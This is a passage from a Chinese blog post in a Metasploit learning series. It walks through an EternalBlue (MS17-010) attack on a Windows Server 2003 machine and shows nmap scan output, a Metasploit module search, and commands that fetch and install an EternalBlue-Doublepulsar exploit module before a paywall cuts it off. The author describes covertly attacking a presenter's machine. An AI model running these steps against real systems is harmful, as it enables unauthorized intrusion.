metasploit学习之路(四)记一次实战--永恒之蓝(MS017-010)

最新推荐文章于 2025-05-20 12:59:22 发布
原创 最新推荐文章于 2025-05-20 12:59:22 发布 · 2.3k 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#永恒之蓝 #metasploit

本文记录了一次使用Metasploit进行永恒之蓝(MS17-010)漏洞实战的过程。通过nmap扫描后,尝试exploit/windows/smb/ms17_010_eternalblue组件未成功,随后采用Eternalblue-Doublepulsar-Metasploit脚本,经过wine环境配置,最终成功利用漏洞攻陷目标系统。

在我的metasploit的学习博客中,也算是实操的一篇,可以对使用流程和一些必要的命令进行学习。

永恒之蓝这个漏洞我没有复现过,但是这一次偶然的机会玩了一把。
大佬在讲台上面传授经验,用的是windows server 2003,于是我偷偷玩了一把,下面说下流程。

1、首先nmap扫描:

msf5 > nmap -sS -sV -A -O -v 10.1.2.217
[*] exec: nmap -sS -sV -A -O -v 10.1.2.217
…………                     //中间过程省略
Nmap scan report for 10.1.2.217
Host is up (0.00099s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE       VERSION
81/tcp   open  http          Microsoft IIS httpd 6.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT POST MOVE MKCOL PROPPATCH
|_  Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
|_http-server-header: Microsoft-IIS/6.0
|_http-title: \xBD\xA8\xC9\xE8\xD6\xD0
| http-webdav-scan: 
|   Server Type: Microsoft-IIS/6.0
|   WebDAV type: Unkown
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|_  Server Date: Sat, 13 Jul 2019 05:24:02 GMT
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds  Windows Server 2003 3790 Service Pack 2 microsoft-ds
1025/tcp open  msrpc         Microsoft Windows RPC
3389/tcp open  ms-wbt-server Microsoft Terminal Service
MAC Address: 00:1C:42:E3:BA:AE (Parallels)
Device type: general purpose
Running: Microsoft Windows XP|2003
OS CPE: cpe:/o:microsoft:windows_xp::sp2 cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_server_2003::sp2
OS details: Microsoft Windows XP SP2 or Windows Server 2003 SP1 or SP2
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=255 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2003

Host script results:
|_clock-skew: mean: -4h00m00s, deviation: 5h39m23s, median: -7h59m59s
| nbstat: NetBIOS name: RCSECAFB4, NetBIOS user: <unknown>, NetBIOS MAC: 00:1c:42:e3:ba:ae (Parallels)
| Names:
|   RCSECAFB4<00>        Flags: <unique><active>
|   WORKGROUP<00>        Flags: <group><active>
|   RCSECAFB4<20>        Flags: <unique><active>
|   WORKGROUP<1e>        Flags: <group><active>
|   WORKGROUP<1d>        Flags: <unique><active>
|_  \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
| smb-os-discovery: 
|   OS: Windows Server 2003 3790 Service Pack 2 (Windows Server 2003 5.2)
|   OS CPE: cpe:/o:microsoft:windows_server_2003::sp2
|   Computer name: rcsecafb4
|   NetBIOS computer name: RCSECAFB4\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2019-07-13T13:24:03+08:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)     //最下面是关于smb的分析,看到这里有dengerous的提示
|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE
HOP RTT     ADDRESS
1   0.99 ms 10.1.2.217

NSE: Script Post-scanning.
Initiating NSE at 13:28
Completed NSE at 13:28, 0.00s elapsed
Initiating NSE at 13:28
Completed NSE at 13:28, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 278.53 seconds
           Raw packets sent: 1098 (49.010KB) | Rcvd: 1017 (41.246KB)

于是开始使用msf尝试smb的漏洞。

2、msf找smb漏洞利用组件

msf5>search smb             //搜索到好多,不列出来了就,偶尔看到了永恒之蓝,于是先试一试
58   auxiliary/scanner/smb/smb_ms17_010                                               normal     Yes    MS17-010 SMB RCE Detection

103  exploit/windows/smb/ms17_010_eternalblue                        2017-03-14       average    Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
104  exploit/windows/smb/ms17_010_eternalblue_win8                   2017-03-14       average    No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
105  exploit/windows/smb/ms17_010_psexec

先是用exploit/windows/smb/ms17_010_eternalblue这个打了一下,没有成功,于是网上查了相关方法,找到了这个利用脚本:git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit
下载之后,把脚本挪到msf里

cp eternalblue_doublepulsar.rb   /opt/metasploit-framework/embedded/framework/modules/exploits/windows/smb/

然后在msf中使用命令reload_all,重新加载所有组件,然后再search:

msf
最低0.47元/天 解锁文章
永恒之蓝漏洞复现(ms17-010)
渗透之路,攻防之间皆学问
01-20 2万+
Metasploit Framework(MSF)是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版中,改成了用Ruby语言编写的了。在kali中,自带了Metasploit工具。
metasploit实战-ms17-010永恒之蓝)漏洞利用与复现
lucashu的博客
04-18 9405
本文目录永恒之蓝概述实验环境实验过程第一步:扫描漏洞第二步:渗透攻击第三步:漏洞利用截屏 永恒之蓝概述 ms17-010永恒之蓝)漏洞是由Shadow Brokers(影子经纪人)在2017年4月公布的大批漏洞之一,该漏洞利用Windows系统的SMB漏洞可以获取系统最高权限。曾经席卷全球的Wanna cry勒索病毒就是不法分子基于该漏洞进行改造。 实验环境 攻击机:Kali Linux 攻击...
网络安全nmap扫描端口命令详解linux网络探测
热门推荐
鹿鸣天涯
10-21 2万+
nmap是一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端。确定哪些服务运行在哪些连接端,并且推断计算机运行哪个操作系统(这是亦称 fingerprinting)。它是网络管理员必用的软件之一,以及用以评估网络系统安全。
HTB AD域渗透Skills Assessment Part I复现
最新发布
qq_33522010的博客
05-20 929
在开展外部渗透测试期间,我们的团队成员在对面向外部的Web服务器进行侦察时,成功发现并利用了一个文件上传点。由于项目优先级调整,该成员在转至紧急项目前,已在/uploads目录部署了受密码保护的Web shell(凭据:admin:My_W3bsH3ll_P@ssw0rd!),为后续评估工作奠定了基础。此次评估获得了客户Inlanefreight的明确授权,要求我们以该初始立足点为起点,深入探索内部网络,重点关注Active Directory环境中的高风险问题。
【域渗透篇】渗透域环境下的windows7与2008-r2
shelter1234567的博客
07-11 1337
本章介绍在windows域环境下进行渗透测试的技能。端口扫描漏洞发现ms17_010永恒之蓝漏洞利用域环境信息收集横向移动MS14-068漏洞利用域成员提权获取域控shell基本环境如下,win7使用两块网卡来模拟内网穿透,在server 2008 搭建域控制器并将win7加入域中。使用kali进行内网横向渗透,获取win7与2008的主机权限 以及域账户最高权限。
永恒之蓝MS17-010
小白一枚多多关注的博客
11-12 5075
永痕之蓝,微软漏洞编号:MS17-010,该漏洞是由黑客组织Shadow Brokers公布出来的,据江湖传言,该漏洞是美军网络安全部门研制出来的。 该漏洞利用的是windows的smb服务,该漏洞可以直接通过smb服务来获取受害机的最高权限
Metasploit 内网渗透二—— 实战渗透操作--感受渗透流程,具体做什么 -永恒之蓝漏洞
天下著书立传者,皆为我师
04-24 3354
渗透测试实战练习1——永恒之蓝漏洞(渗透攻击 Win7 主机并远程执行命令)以及mysql空密码扫描利用(获取mysql数据库中信息)
ms17-010(永恒之蓝)攻击实战
02-21
### 关于MS17-010永恒之蓝)漏洞的攻击实战技巧 #### 使用Metasploit框架进行渗透测试 为了验证目标系统是否受到MS17-010的影响,可以通过Metasploit Framework (MSF) 来实施。具体操作如下: 当检测到可能存在...
小计一次永恒之蓝实战
08-20
在本次实战中,可以使用Metasploit来进一步利用MS17-010漏洞,实现对目标系统的控制。 ##### Metasploit利用MS17-010漏洞步骤: 1. **设置Meterpreter会话**:选择一个适合的payload,例如`windows/shell/reverse_...
15.永恒之蓝exp----
08-21 627
永恒之蓝exp 2017年,影响于全世界 SMB ripid7官网获取ms17-010的exp信息 Rapid7: https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue Scanner:https://github.com/rapid7/metasploit-framework/blob/ma...
eternalblue_doublepulsar
11-25
这才是最纯正的eternalblue_doublepulsar!!!!!!!
永恒之蓝MS17-010
A_dmin的博客
09-16 1753
永恒之蓝MS17-010 实验概述   Ms17-010漏洞又称永恒之蓝漏洞,自从EternalBlue这个Exploit被影子经纪人公布到互联网上后,就成为了“明星”。在过去的五月中,这个Exploit被多款恶意软件利用。包括肆虐的WannaCryp0t,无文件的勒索软件UIWIX和SMB蠕虫EternalRocks,本实验介绍如何利用ms17-010漏洞对windows7进行攻击。 实验目的 ...
永恒之蓝漏洞ms17-010
weixin_65336001的博客
05-01 2109
什么是永恒之蓝漏洞?利用ms17-010漏洞攻击Windows7复现超细教程
EternalBlue永恒之蓝漏洞复现(MS17-010
m0_65615852的博客
04-12 1580
EternalBlue永恒之蓝漏洞复现(ms17-010)超级详细过程
永恒之蓝EternalBlue(ms17-010)复现
yiyiiyiy的博客
11-24 5495
前言 漏洞描述Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,电脑只要开机,攻击者就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。漏洞复现 环境搭建角色 系统版本 IP 备注 靶机 windows 7 (x64) 192.168.198.131 打开445端口,关闭防火
网络安全与Kali Linux:利用MSF对Win7进行永恒之蓝攻防演练实战
Kali与编程
09-11 1586
课前声明: 1、本分享仅做学习交流,请自觉遵守法律法规! 2、搜索:Kali与编程,学习更多网络攻防干货! 基础知识介绍: 1.何为永恒之蓝永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病
MS17-010(Eternal blue永恒之蓝)漏洞利用+修复方法
记录学习
06-21 7901
msf永恒之蓝漏洞复现过程以及修复建议
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值